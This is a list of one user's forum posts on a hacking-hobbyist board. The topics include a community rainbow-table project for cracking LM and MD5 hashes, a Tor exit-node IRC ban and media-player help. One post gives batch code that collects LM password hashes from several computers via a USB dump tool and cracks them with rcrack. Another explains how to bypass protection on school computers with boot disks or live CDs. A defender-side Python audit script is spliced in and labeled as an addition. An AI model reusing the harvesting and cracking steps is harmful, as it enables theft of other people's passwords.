Everything posted by silivrenion

  1. This topic has been added to the CRT meeting agenda. http://www.hak5.org/wiki/Community_Rainbow.../Meeting_Agenda
  2. That's correct, Windows will default to NTLM if the pass is longer than 14 characters. Personally, my high security passwords are 16 characters or greater, defeating any chance of cracking.
  3. The Community Rainbow Tables project has been thinking about what the next technology will be; however, no final plans have been set for the next one. The majority of people voted MD5, but we'll have a meeting coming up soon to allow people to voice their opinions. If you want to integrate the NTLM tables with the Community Rainbow Tables project, please contact me in the RainbowTables channel, irc.hak5.org #RainbowTables, and we can discuss what set you've begun to generate, and whether it'll make sense to continue it via the community. Also, keep an eye on rtables.blogspot.com, specifically the RSS feed of the page. News for the Community Rainbow Tables project is submitted there. If you have any questions, again, feel free to ask in the IRC channel. Kudos on the ideas, Silivrenion
  4. There's a section of the wiki now devoted to the mail-in program. The new program's name is RainbowTables by Mail... http://hak5.org/w/index.php?title=Communit...wTables_by_mail
  5. It's uncompressed because if it was compressed, the end user would need (compressedspace) + (uncompressedspace) file space in order to use it, and 120GB is enough.
  6. The RainbowTables project has finished generating the 120GB LM All set, and they are now available for public download via torrent at: http://silivrenion.com/rainbowtables/hak5_...all_1-7.torrent There is also a CrackBot available in the IRC channel at irc.hak5.org #RainbowTables that can crack your passwords live. Be patient with the bot, it takes a while to search for your hash! If you wish to grab a copy of the Rainbow Tables, you must have 120GB free for the entire set. You can always grab less if you really want, but your success rate will be less. :P We'll start the MD5 soon. :D
  7. MD5 seems to win.. we now need to compile information about the MD5 tables, generating with them, and what table profiles and hardware space are required.
  8. Heh, sorry about that, I was kind of hoping other people had more information than me about the actual technologies... Basically, Google searching gives some good insight into the different technologies and what they do from a usage standpoint. Cisco PIX tables would contribute to Cisco PIX firewall password cracking. Information about MD2,4,5 are available via RSA Security :: http://www.rsasecurity.com/rsalabs/node.asp?id=2253 Practical applications for MD encryption I'm at a lack of information about. The usage of MySQL SHA1 encryption is defined in the MySQL 5.0 Ref Manual at http://dev.mysql.com/doc/refman/5.0/en/enc...l#function_sha1 There's an excellent NTLM article at Wikipedia at http://en.wikipedia.org/wiki/NTLM RIPEMD-160 is also explained in Wikipedia at http://en.wikipedia.org/wiki/RIPEMD-160 Last, but not least, SHA1 information can be found at http://en.wikipedia.org/wiki/SHA1 and http://www.w3.org/PICS/DSig/SHA1_1_0.html
  9. For those of you who are unfamiliar with the Community Rainbow Tables project, you can check us out at http://www.hak5.org/wiki/index.php?title=C..._Rainbow_Tables For everyone else, we have successfully filled the active rainbow tables list with generating tables!!! That means, there's no more unassigned tables left!!! ::pause for cheering/beer/etc.:: Alright. The battle's half over with LM Hashes. We need to finish up generating the tables and create a torrent distribution of it. The next question is what are we going to do now? Now that there's no unassigned sections, we need to start thinking about the next direction we will start building in. Our choices for upcoming tables consist of Cisco PIX, MD2, MD4, MD5, MySQL SHA1, MySQL v.3.23, NT LanMan, RIPEMD-160, and SHA1. We need to compare and contrast the hardware, time, disk space, bandwidth requirements, distributability, and mathematical preferences behind these choices to make sure we pick a next table group that will be an important significance to the community. Please discuss the pros and cons, and feasibility of these technologies, so that we can choose which will be the next in line.
  10. I officially released the schematic and information about the project to Hak5. It's in the Dev forums, for those of you that have access!!
  11. Haha, the screen has pretty colors.. :D Unfortunately, I don't know how to help with recovering the data off the phone.. :( People lose data, I guess... just a fact of life.
  12. Definitely a worthwhile project!! :D
  13. Please pick which solution you vote for, and the solution with the highest rating will become the policy. Basically in #RainbowTables we've been talking about ways to handle FTP access to allow people to submit their files. There are two current solutions.
        1. One single anonymous login, disable delete/overwrite/rename/mkdir. Users can only upload files. The downside to this is that if an upload fails, the fragment on the server must be deleted manually before that person's upload will work again.
        2. Individual logins for contributors, each contributor has full rights to their own directory. Users will be able to resume their uploads if they wish; however, this is a lot of trouble to maintain username/password combinations for all of the contributors to the project.
  14. A small modification can be made that will allow someone to easily create a file of lm password hashes alongside the usual machine output. The benefit? Well, let's say someone wanted to go to several computers, and wanted to grab a long list of passwords to crack in one fell swoop. Copying and pasting from all of the individual log files would be tedious to create an lm hash list, so why not create it on the fly?

      Edit your switchblade batch file so that at the bottom, you see this. Also, note that your switchblade file might not have the URL history, depending on the version you chose. Pay attention to the line that starts with TYPE.

          ... [continued from file] ...
          Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
          echo ***********[Dump URL History]******* >> Documents\logfiles\%computername%.log 2>&1
          Echo ************************************ >> Documents\logfiles\%computername%.log 2>&1
          cscript //nologo .\DUH.vbs >> Documents\logfiles\%computername%.log 2>&1
          TYPE Documents\logfiles\%computername%.log | find ":::" | find /V "NO PASSWORD" | find /V "HelpAssistant" >> Documents\logfiles\pwfile.txt
          :End
          exit

      Pay special attention to the line that starts with TYPE. Let's go through it one by one.

          TYPE Documents\logfiles\%computername%.log

      This will get the output we just created with switchblade, so we can work with it.

          find ":::"

      I noticed all of the lm hashes had three colons in their lines, which appeared nowhere else. Might as well use that to our advantage!

          find /V "NO PASSWORD" | find /V "HelpAssistant"

      There's two types of lines that we don't want to see, ones that have no password to crack, and those that are of the Microsoft created account "HelpAssistant". If there's other search terms you don't want to see, you can add them also.

          >> Documents\logfiles\pwfile.txt

      This will create a password file if it doesn't exist. If it does exist, the password file will be appended to, so that you can rapidly gather passwords into one file for quick cracking.... which can be done with the next small code edit.

      Making rcrack one-click friendly

      Use notepad to create the following file, and save it as crack.bat or something with a batch extension. This will be saved on your cracking computer at home that contains your rainbow tables. Hopefully you don't bring those with you on your USB key!!! :o

          @echo off
          echo Starting crack, writing output to log.txt ...
          rem "echo." writes a blank line; a bare "echo" would write "ECHO is off."
          echo. >> log.txt
          echo ************************************ >> log.txt
          echo Cracking started by %username% at %date% %time% >> log.txt
          rcrack.exe *.rt -f pwfile.txt >> log.txt
          echo Cracking complete at %date% %time% >> log.txt
          echo ************************************ >> log.txt
          echo Success!

      This batch file will process your password file you created, and output the status of it to log.txt in your cracking folder. This way you can leave your computer cracking unattended, and still be able to get the results later in an organized manner, with all of your passwords you gathered in one neat and convenient location.
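
Added example, not part of the original posts: a defender-side audit of the same pwdump-style lines that posts 2 and 14 discuss, reporting which accounts still have an LM hash stored and which are NT-only. It assumes the common `user:rid:lm:nt:::` layout; the function names, the sample lines and their hash values are constructed for illustration.

```python
import re

# Well-known constants: the LM and NT hashes of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Assumed layout of a pwdump-style line: user:rid:lm:nt:::
LINE_RE = re.compile(r"^([^:]+):(\d+):([^:]*):([^:]*):::\s*$")
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")


def classify(line):
    """Return (user, status) for a pwdump-style line, or None for other text."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    user, _rid, lm, nt = m.groups()
    # A field counts as "set" only if it is real hex and not the empty-password hash;
    # the "NO PASSWORD****" filler some dump tools print therefore counts as unset.
    lm_set = bool(HEX32.match(lm)) and lm.lower() != EMPTY_LM
    nt_set = bool(HEX32.match(nt)) and nt.lower() != EMPTY_NT
    if lm_set:
        return user, "LM_STORED"   # weakest case: an LM hash exists for this account
    if nt_set:
        return user, "NT_ONLY"     # e.g. password longer than 14 chars, or LM storage off
    return user, "NO_PASSWORD"


def audit(lines):
    """Map each account found in the log lines to its status."""
    return dict(r for r in map(classify, lines) if r)


def lm_exposed(lines):
    """Accounts to prioritise for a password change or LM-storage policy fix."""
    return sorted(u for u, s in audit(lines).items() if s == "LM_STORED")


# Constructed sample log; the hash values are made-up hex, not real credentials.
SAMPLE = """\
***********[Dump SAM]***********
alice:1003:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
bob:1004:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
carol:1005:NO PASSWORD*********************:8899aabbccddeeff0011223344556677:::
""".splitlines()

if __name__ == "__main__":
    for user, status in audit(SAMPLE).items():
        print(f"{user:10} {status}")
```
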
  15. I know it's kind of a strange way to do it, but there's a program called "ajoo blast" that will let you set up a streaming music server, and you can connect to it with a second copy of the client. It's kinda limited in that it's only ajoo to ajoo communication, but it's a good thing if you just want to play music privately for yourself. :) Otherwise, shoutcast and winamp will let you set up an official streaming audio content that's compatible with everyone else.
  16. Yeah, it's slightly strange that we're introduced to tor in Hak5 Episode 10, yet IRC has it banned. :S
  17. tor.eff.org :: wiki.noreply.org :: http://wiki.noreply.org/noreply/TheOnionRo...AQ#DefaultPorts ::
  18. I personally use the default exit policies on my exit node, but if there's abuse I hear about on freenode #tor, I remove those ports.
  19. Where would the money go? Supporting EFF and Tor, or somewhere else? Monopolizing on an open source product seems wrong on so many levels... -.-
  20. I run as an exit node for the Tor network, because I support anonymous internet practices, and the freedom of the people behind the Great Firewall of China and other restrictive locations. However, I woke up this morning to find my IRC log gives a gloomy message ::

          * Connect retry #1 208.98.24.4 (6667)
          -
          -vertex.hak5.org- *** Looking up your hostname...
          -
          -vertex.hak5.org- *** Found your hostname (cached)
          -
          -vertex.hak5.org- *** Checking ident...
          -
          -vertex.hak5.org- *** No ident response; username prefixed with ~
          -
          -vertex.hak5.org- *** If you are having problems connecting due to ping timeouts, please type /quote pong AAA82881 or /raw pong AAA82881 now.
          -
          -vertex.hak5.org- *** You are banned from Hak5IRC (Your IP, 24.147.xxx.xx, is in our TOR Server List.. http://www.sectoor.de/tor.php?ip=24.147.xxx.xx)
          -
          Closing Link: Silivrenion[c-24-147-xxx-xx.hsd1.ma.comcast.net] (User has been banned from Hak5IRC (Your IP, 24.147.xxx.xx, is in our TOR Server List.. http://www.sectoor.de/tor.php?ip=24.147.xxx.xx))
          -
          * Disconnected

      As a supporter of anonymous internet, and despite the fact that I promised owine I would not connect through the Tor network to irc.hak5.org, I was banned simply because of a service I run on my network. Understandably, all services are susceptible to attack, and some server admins can ban those services at least temporarily until the attacks subside, but blocking all nodes hampers the reach of the entire Tor internet project. With internet neutrality rights being questioned today, Tor may be a white flag of hope in the distance for many people. I don't mean to sound like a politician or anything, I just want to be able to support the projects I believe in, while being able to connect to hak5 IRC.

      Freenode resolved a lot of these issues by implementing a whitelist of Tor users which are known to be 1. credible and trustworthy, 2. representative of the online Tor population, 3. under control of their exit node's traffic and bandwidth policies. Maybe this is a solution applicable here?

      Authentication-wise, I am not interested in anonymity myself to the Hak5 network. I only care about the anonymity of others, so I contribute my bandwidth. Is this a reason to ban me, when I carefully maintain my bandwidth and flood controls and try my best to provide a suitable service for everyone? If there's any authentication that can be done to verify my actual identity on the server, I'd do it. Heck, I'd call the phone or write snail mail if it meant the ability to talk on Hak5. Owine mentioned on the IRC of an SSL connection to the IRC, but I wasn't able to make a connection to it. Is this my hope for connection?

      Please allow me to support my projects which I believe in while being able to communicate on my favorite channel. Please whitelist my IP and other trusted Tor exit nodes, or remove the sectoor DNSBL ban, or provide a way for people who serve as exit nodes, but aren't connected through the Tor network to be able to use irc.hak5.org. I've been a fan of Hak5 up to this point, please don't give me a reason to change that now.
  21. Ok, now the question of truth. Many old devices couldn't support HTML directly, and used a .wml standard instead. Is VLC compatible with this standard, so I can use my older devices?
  22. Actually, I found in DirectX settings a place to select the display to fullscreen on (Video/DirectX). Also, I found Democracy Player doesn't auto play files :D
  23. So I've had enough problems getting an OS to support the TV Out of my graphics card. I finally got Windows XP to work, and downloaded VLC; except I found that the inline settings "start c:\vlc\vlc.exe h:\media --intf=http --fullscreen" causes VLC to open in the primary monitor, NOT monitor 3, where the TV is connected. I'd like to be able to rely on the script for the entire process, but I can't find a way to get VLC to open on that monitor. I tried opening VLC and setting it on that monitor and quitting, but when it reopened, it opened on the primary monitor again! A secondary problem I'm having is finding a decent podcast downloader... FireAnt.tv seems to like autoplaying things once they are downloaded, and has no configuration options for these settings, so I'm looking for a new downloader. Any help would be appreciated!
  24. I'm sure the person is quite aware of the morals behind doing what he/she is doing at this point. If you insist on doing this, the best method to get DATA off a drive would be through a CD live distro, like knoppix. You can either put the data on the local/public network, or onto a flash drive. If you are interested in screwing around with the integrity of the computer's functions.. might as well just treat it like crap anyway, but there's a reason why that's secure; also since it's really immature to make mspaint backgrounds containing cuss words and other tagged-like pictures. With DOS oriented systems, most protection classes can be overridden with a cleverly constructed boot disk. Simply boot the system off a command.com and configuration files contained on a customized boot disk, and in most cases sub-windows level protection programs won't boot; however, stupid protection programs will boot (the ones that are told to boot as part of settings in the registry's Startup area). Either way, if it's protected, it's meant to not be touched with. If you really want to play around, why don't you sign up for an internship or something to learn how these things work, with the amnesty of the school to be able to do whatever you want legally with permission.